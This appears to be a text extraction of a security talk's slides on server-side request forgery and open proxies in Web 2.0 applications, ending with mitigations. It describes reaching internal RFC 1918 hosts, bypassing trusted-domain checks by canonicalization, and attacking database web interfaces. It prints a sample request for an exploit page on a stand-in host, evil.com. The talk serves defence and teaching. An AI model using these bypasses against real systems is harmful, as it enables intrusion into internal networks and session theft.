Transcript C++ Code
Emerging Threats in Distributed
Applications (Web 2.0)
Waqas Nazir
Managing Security Consultant, Digital Security
Overview
• Rich features in applications
– Hosting RSS Feeds
– Hosting 3rd party content on pages
– Single Sign On
– Data Manipulation (Translation Services, Redesigning)
• Design and implementation flaws
• Threat to end users and hosting networks
Background
• Code Excerpts
– WebRequest wbReq = new GetMethodWebRequest(Userstring);
Java Code
– WebRequest* myReq = WebRequest::Create(UserURLObject);
C++ Code
– HttpWebRequest wbRequest =
(HttpWebRequest)WebRequest.Create(Userstring);
.NET Code
Background
Continued …
• An application will have code like for two main
reasons:
1. It wants to operate independent of the data
sources
2. It wants to give the user the ability to select
where the data comes from
Visual Representation
news.bbc.com
Request BBC News to be Hosted
on a page
Sends the content Requested
End User Bob
www.foonet.com
Issues
• Design Issues
• Implementation Issues
• Potential Solutions
Information Disclosure
news.bbc.com
DMZ or
Private
Request an internal page to be
Hosted on foonet.com
Sends the content Requested
www.foonet.com
End User Bob
Information Disclosure
• Ability to request internal pages from the DMZ
and intranet
• Explicit routes to core network
• Privilege escalation
• Mount attacks on all RFC 1918 IP Space
• 10.0.0.0 - 10.255.255.255 (10/8 prefix)
• 172.16.0.0 - 172.31.255.255 (172.16/12 prefix)
• 192.168.0.0 - 192.168.255.255 (192.168/16 prefix)
Open Application Proxies
• Channel Attacks to other sites and
applications
• Use to bypass restrictions for sites due to
indirection
• Traffic manipulation
• ldap://, telnet://, file://, mailto://, etc
• Sending Traffic to specific ports to exploit known
vulnerabilities in services
Implementation Issues
• Third party content is typically hosted in
‘throw away domains’
• These domains map to the same IP addresses
some times
• Examples: Google uses an IP address to host third party
content. An NSLookup to IP address shows the host
name is google.com.
• Some applications use different domains
names to host third party content
Implementation Issues
• Application logic is used to check if a page being requested
should be loaded in the trusted domain or the un-trusted
domain.
– If (hostname == trusted && Page == un-trusted)
{
Redirect to throw away domain
}
– Canonicalization can be used to bypass this logic. The hostname could
be have a trailing dot “.”
» Example: www.trusted.com. (FQDN or absolute DNS) Servers will pass this string as the
hostname which will pass the comparison as www.trusted.com. != www.trusted.com
» Example: similarly adding a trailing forward slash and adding another page, IIS will route the
request to the right page but the Page == un-trusted will return false due to adding another
page. http://www.trusted.com/untrusted.aspx/trusted.aspx
Implementation Issues
• By passing the throw away domain logic results in
compromising the session of end users.
• This could have a greater impact with SSO.
Summary
•
•
•
•
Open application proxy
Information Disclosure
Compromise End User Sessions
Compromise the Network Hosting such an
application
Additional Attacks
• Attacking databases
– All most all major database servers support a web
interface
» SQL Server
» My SQL
• SELECT, DESCRIBE, JOIN, SHOW, DROP, CREATE, and USE, and advanced
query options such as LIMIT, DISTINCT, and GROUP
• If anything the backend to the web server supports
web interface, than that can be queried as the front
end will have permissions to that.
Additional Attacks
• Request Big chunks of data to cause Denial of
Service
• Performance degradation
Additional Attacks
www.evil.com
DMZ or
Private
Request Content
Request evil.com to be hosted by
foonet.com
Sends the content Requested
www.foonet.com
End User Browser
Additional Attacks
•
•
•
•
•
•
•
•
•
GET http://Evil.com/Exploit.html HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.2; SV1; .NET CLR 1.1.4322; InfoPath.2; MS-RTC LM 8;
.NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Host: evil.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Authorization: Basic VVNFUkZPTzpCQVI=
Additional Attacks
• Native code is used to parse and manipulate Third
party content. Especially translation services use C and
C++ code for performance reasons.
– Mal-formatted HTML documents can lead to native
memory bugs.
– Stack Overflows, Heap Overflows, Integer Overflows, etc…
– Instead of using built-in APIs, code similar to HTML parsing
engines of browsers is written.
» Example:
char *sc;
sc = strchr(str, ‘=');
while (sc != NULL) {
sc = strchr(sc - 1, ‘ '); // Integeroverflow
…
}
return 0;
}
Potential Solutions
news.bbc.com
DMZ or
Private
Request BBC News to be Hosted
on a page
Sends the content Requested
www.foonet.com
End User Browser
Potential Solutions
• Validate the user controlled parameter before
creating new request for protocol
• Disallow all internal requests
• Ensure that the throw away domain logic can
not be circumvented due to canonicalization
issues and implementation flaws
21